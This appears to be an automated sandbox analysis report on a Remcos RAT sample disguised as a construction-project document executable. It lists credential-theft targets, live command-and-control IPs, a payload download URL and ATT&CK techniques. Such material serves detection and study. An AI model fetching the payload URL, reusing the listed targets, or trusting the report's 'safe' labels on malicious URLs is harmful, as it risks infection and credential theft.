              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: NULL target: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: NULL target: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeSection loaded: NULL target: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\osspeswmhebwmnhvszpvhldf"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\zmfiflhnvmtjoudzbkcxkyywgeg"Jump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeProcess created: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe "C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe" /stext "C:\Users\user\AppData\Local\Temp\jokafdshjuloyardsuwyvdtnhlpesm"Jump to behavior
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerg
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerxe7
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944218766.000000000249E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerk
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2944218766.000000000249E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerx
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerECT IN .
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager CONSTR)
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager<
              Source: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.drBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2933 cpuid 4_2_332B2933
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 4_2_332B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_332B2264
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,6_2_004082CD
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: 0_2_00405FAE GetVersion,LdrInitializeThunk,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,0_2_00405FAE
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Mail credentials (via file registry)
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: ESMTPPassword6_2_004033F0
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword6_2_00402DB3
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword6_2_00402DB3
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 8064, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\Desktop\Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-UOMZ21Jump to behavior
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000004.00000002.2943881499.000000000246B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2942457183.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe PID: 7864, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Deobfuscate/Decode Files or Information              		1
              OS Credential Dumping              		1
              System Time Discovery              		Remote Services1
              Archive Collected Data              		1
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts2
              Command and Scripting Interpreter              		Boot or Logon Initialization Scripts1
              Access Token Manipulation              		2
              Obfuscated Files or Information              		11
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		2
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
              Process Injection              		1
              Software Packing              		2
              Credentials in Registry              		3
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		1
              Non-Standard Port              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              DLL Side-Loading              		1
              Credentials In Files              		228
              System Information Discovery              		Distributed Component Object Model11
              Input Capture              		1
              Remote Access Software              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Masquerading              		LSA Secrets231
              Security Software Discovery              		SSH2
              Clipboard Data              		2
              Non-Application Layer Protocol              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Virtualization/Sandbox Evasion              		Cached Domain Credentials1
              Virtualization/Sandbox Evasion              		VNCGUI Input Capture112
              Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Access Token Manipulation              		DCSync4
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
              Process Injection              		Proc Filesystem1
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576192 Sample: Ref GEC409876  CONSTRUCTION... Startdate: 16/12/2024 Architecture: WINDOWS Score: 100 27 geoplugin.net 2->27 41 Suricata IDS alerts for network traffic 2->41 43 Found malware configuration 2->43 45 Multi AV Scanner detection for submitted file 2->45 47 10 other signatures 2->47 8 Ref GEC409876  CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe 1 34 2->8         started        signatures3 process4 file5 23 C:\Users\user\AppData\Local\...\System.dll, PE32 8->23 dropped 11 Ref GEC409876  CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe 3 15 8->11         started        process6 dnsIp7 29 162.251.122.87, 2404, 49737, 49738 UNREAL-SERVERSUS Canada 11->29 31 geoplugin.net 178.237.33.50, 49739, 80 ATOM86-ASATOM86NL Netherlands 11->31 33 66.63.187.30, 49736, 80 ASN-QUADRANET-GLOBALUS United States 11->33 25 C:\ProgramData\remcos\logs.dat, data 11->25 dropped 49 Detected Remcos RAT 11->49 51 Maps a DLL or memory area into another process 11->51 53 Installs a global keyboard hook 11->53 16 Ref GEC409876  CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe 1 11->16         started        19 Ref GEC409876  CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe 1 11->19         started        21 Ref GEC409876  CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe 2 11->21         started        file8 signatures9 process10 signatures11 35 Tries to steal Instant Messenger accounts or passwords 16->35 37 Tries to harvest and steal browser information (history, passwords, etc) 16->37 39 Tries to steal Mail credentials (via file / registry access) 19->39

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe21%ReversingLabsWin32.Trojan.NsisInject

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\nszA07E.tmp\System.dll0%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d0%Avira URL Cloudsafe
              https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d0%Avira URL Cloudsafe
              http://www.skinstudio.netG0%Avira URL Cloudsafe
              http://66.63.187.30/wBWcspgeBmkxYD199.bin_(0%Avira URL Cloudsafe
              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf680%Avira URL Cloudsafe
              https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fcc0%Avira URL Cloudsafe
              https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e7420%Avira URL Cloudsafe
              https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa4370%Avira URL Cloudsafe
              https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d7888073423260%Avira URL Cloudsafe
              http://66.63.187.30/wBWcspgeBmkxYD199.bin0%Avira URL Cloudsafe
              https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d50%Avira URL Cloudsafe
              https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad70%Avira URL Cloudsafe
              https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b030%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              geoplugin.net
              		178.237.33.50
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://66.63.187.30/wBWcspgeBmkxYD199.binfalse
                • Avira URL Cloud: safe
                		unknown
                http://geoplugin.net/json.gpfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.imvu.comrRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                    		high
                    https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DestinationEndpoint=Wbhv4333.tmp.5.drfalse
                      		high
                      http://www.imvu.comtaRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://ow1.res.office365.com/apc/trans.gif?29331761644ba41ebf9abf96ecc6fbadbhv4333.tmp.5.drfalse
                          		high
                          https://aefd.nelreports.net/api/report?cat=bingthbhv4333.tmp.5.drfalse
                            		high
                            https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?66601c3b572f284b9da07fccbhv4333.tmp.5.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.nirsoft.netRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000005.00000002.2221230831.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                              		high
                              https://aefd.nelreports.net/api/report?cat=bingaotakbhv4333.tmp.5.drfalse
                                		high
                                https://deff.nelreports.net/api/report?cat=msnbhv4333.tmp.5.drfalse
                                  		high
                                  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BLUr5a&Frbhv4333.tmp.5.drfalse
                                    		high
                                    http://66.63.187.30/wBWcspgeBmkxYD199.bin_(Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.skinstudio.netGRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exefalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?fc66b8a78ab7a1394f56e742bhv4333.tmp.5.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-BL2r8e&Frbhv4333.tmp.5.drfalse
                                      		high
                                      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2967580790.0000000033280000.00000040.10000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                        		high
                                        https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51bhv4333.tmp.5.drfalse
                                          		high
                                          https://www.google.comRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                            		high
                                            https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950cbhv4333.tmp.5.drfalse
                                              		high
                                              http://geoplugin.net/json.gpGRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://maps.windows.com/windows-app-web-linkbhv4333.tmp.5.drfalse
                                                  		high
                                                  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platbhv4333.tmp.5.drfalse
                                                    		high
                                                    https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8bhv4333.tmp.5.drfalse
                                                      		high
                                                      https://login.yahoo.com/config/loginRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exefalse
                                                        		high
                                                        http://www.nirsoft.net/Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          		high
                                                          https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816dbhv4333.tmp.5.drfalse
                                                            		high
                                                            https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367dbhv4333.tmp.5.drfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgbhv4333.tmp.5.drfalse
                                                              		high
                                                              https://www.office.com/bhv4333.tmp.5.drfalse
                                                                		high
                                                                https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8bhv4333.tmp.5.drfalse
                                                                  		high
                                                                  http://geoplugin.net/json.gp;n-Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68bhv4333.tmp.5.drfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2bhv4333.tmp.5.drfalse
                                                                      		high
                                                                      http://geoplugin.net/json.gpeRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8dbhv4333.tmp.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437bhv4333.tmp.5.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.imvu.comRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205049456.000000000067D000.00000004.00000020.00020000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000002.2205246174.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000007.00000003.2205077069.000000000067D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://aefd.nelreports.net/api/report?cat=wsbbhv4333.tmp.5.drfalse
                                                                            		high
                                                                            https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326bhv4333.tmp.5.drfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://geoplugin.net/json.gpwRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exe, 00000004.00000002.2943881499.0000000002452000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://nsis.sf.net/NSIS_ErrorErrorRef GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exefalse
                                                                                		high
                                                                                https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03bhv4333.tmp.5.drfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
